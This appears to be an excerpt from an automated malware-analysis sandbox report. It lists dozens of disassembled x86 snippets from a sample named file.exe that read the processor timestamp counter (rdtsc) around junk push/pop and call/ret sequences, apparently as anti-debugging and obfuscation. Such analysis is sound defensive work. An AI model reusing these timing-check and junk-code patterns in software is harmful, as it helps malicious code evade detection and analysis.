Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FDBFD second address: 8FDC43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push edi 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 pop edi 0x00000014 pop eax 0x00000015 and cx, FB72h 0x0000001a lea ebx, dword ptr [ebp+1244FA24h] 0x00000020 jmp 00007F228CBCA0AEh 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F228CBCA0B5h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8FDC43 second address: 8FDC60 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F228D5156C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d jmp 00007F228D5156CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91F33C second address: 91F342 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8EB56A second address: 8EB570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EB570 second address: 8EB582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F228CBCA0A8h 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D127 second address: 91D142 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F228D5156D7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D2F0 second address: 91D2F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D622 second address: 91D626 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D626 second address: 91D63B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a popad 0x0000000b jl 00007F228CBCA0CAh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D63B second address: 91D656 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F228D5156D2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DC2D second address: 91DC31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DC31 second address: 91DC37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DEDB second address: 91DEE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DEE0 second address: 91DEE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91DEE6 second address: 91DEEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E051 second address: 91E05B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E05B second address: 91E06F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F228CBCA0B0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E333 second address: 91E33F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F228D5156C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F3CE7 second address: 8F3D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F228CBCA0B9h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E47E second address: 91E482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E482 second address: 91E4A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F228CBCA0B7h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EA2F second address: 91EA33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EA33 second address: 91EA39 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EA39 second address: 91EA49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F228D5156C6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EA49 second address: 91EA6B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F228CBCA0A6h 0x00000008 jng 00007F228CBCA0A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F228CBCA0B0h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EA6B second address: 91EA6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EA6F second address: 91EA7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EA7B second address: 91EA7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EBF6 second address: 91EC00 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F228CBCA0AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EC00 second address: 91EC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EC0D second address: 91EC2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F228CBCA0B5h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EC2B second address: 91EC35 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F228D5156C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EED9 second address: 91EEDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91EEDD second address: 91EEE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9211D3 second address: 9211D9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9211D9 second address: 9211FE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F228D5156D8h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9211FE second address: 921208 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F228CBCA0A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92079E second address: 9207C9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F228D5156D8h 0x00000008 jmp 00007F228D5156D2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jbe 00007F228D5156D4h 0x00000016 push eax 0x00000017 push edx 0x00000018 jns 00007F228D5156C6h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 921973 second address: 92197D instructions: 0x00000000 rdtsc 0x00000002 js 00007F228CBCA0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92197D second address: 9219B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F228D5156D8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f pushad 0x00000010 push esi 0x00000011 jnc 00007F228D5156C6h 0x00000017 pop esi 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b pop edx 0x0000001c popad 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9219B6 second address: 9219BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9219BC second address: 9219C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92395B second address: 923961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 924E34 second address: 924E38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 924E38 second address: 924E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 924E44 second address: 924E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8115 second address: 8E812B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F228CBCA0B2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E812B second address: 8E814E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F228D5156D9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E814E second address: 8E8152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B60E second address: 92B612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B76A second address: 92B770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B770 second address: 92B77D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B77D second address: 92B796 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F228CBCA0AFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B796 second address: 92B7A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F228D5156C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92BAA6 second address: 92BAAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DC87 second address: 92DC8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DC8C second address: 92DC96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F228CBCA0A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DFC1 second address: 92DFC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DFC5 second address: 92DFC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DFC9 second address: 92DFCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E355 second address: 92E35A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E422 second address: 92E428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E8BB second address: 92E8BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92EDF5 second address: 92EDF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92EDF9 second address: 92EE0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jnl 00007F228CBCA0A8h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92FCE8 second address: 92FCEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 931082 second address: 931088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 931088 second address: 9310A2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F228D5156CFh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9310A2 second address: 9310AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F228CBCA0A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 931957 second address: 93195D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93329C second address: 9332A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 933CB6 second address: 933D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d mov esi, dword ptr [ebp+122D2A9Ch] 0x00000013 push 00000000h 0x00000015 pushad 0x00000016 push ebx 0x00000017 mov bl, 2Ch 0x00000019 pop ebx 0x0000001a jmp 00007F228D5156CBh 0x0000001f popad 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push eax 0x00000025 call 00007F228D5156C8h 0x0000002a pop eax 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f add dword ptr [esp+04h], 0000001Dh 0x00000037 inc eax 0x00000038 push eax 0x00000039 ret 0x0000003a pop eax 0x0000003b ret 0x0000003c push esi 0x0000003d mov esi, 094C20B3h 0x00000042 pop esi 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 pop edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 936D4E second address: 936D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 936D52 second address: 936D5C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F228D5156C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 936D5C second address: 936D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 936D62 second address: 936D68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 936D68 second address: 936D6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 939EAD second address: 939EB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 939EB1 second address: 939EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 939EB7 second address: 939EDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228D5156D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F228D5156C8h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 939EDA second address: 939EE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93AE01 second address: 93AE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 938FB8 second address: 938FBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B001 second address: 93B010 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F228D5156CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B010 second address: 93B01A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F228CBCA0ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B01A second address: 93B03D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F228D5156D9h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B03D second address: 93B04B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F228CBCA0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B04B second address: 93B04F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D089 second address: 93D08F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93D08F second address: 93D093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93C0E3 second address: 93C0E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F0F1 second address: 93F0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93E353 second address: 93E358 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941122 second address: 941189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F228D5156C8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 cmc 0x00000024 push 00000000h 0x00000026 jo 00007F228D5156CCh 0x0000002c add dword ptr [ebp+1245AFC3h], edx 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007F228D5156C8h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 0000001Ch 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e mov di, 4A37h 0x00000052 xchg eax, esi 0x00000053 push eax 0x00000054 push edx 0x00000055 push ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 941189 second address: 94118E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 942189 second address: 94218D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94218D second address: 942197 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 942197 second address: 94219B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98661B second address: 986623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 986623 second address: 986675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F228CBCA0B7h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jp 00007F228CBCA0A6h 0x00000014 jmp 00007F228CBCA0B9h 0x00000019 push eax 0x0000001a pop eax 0x0000001b push eax 0x0000001c pop eax 0x0000001d popad 0x0000001e jmp 00007F228CBCA0AEh 0x00000023 rdtsc
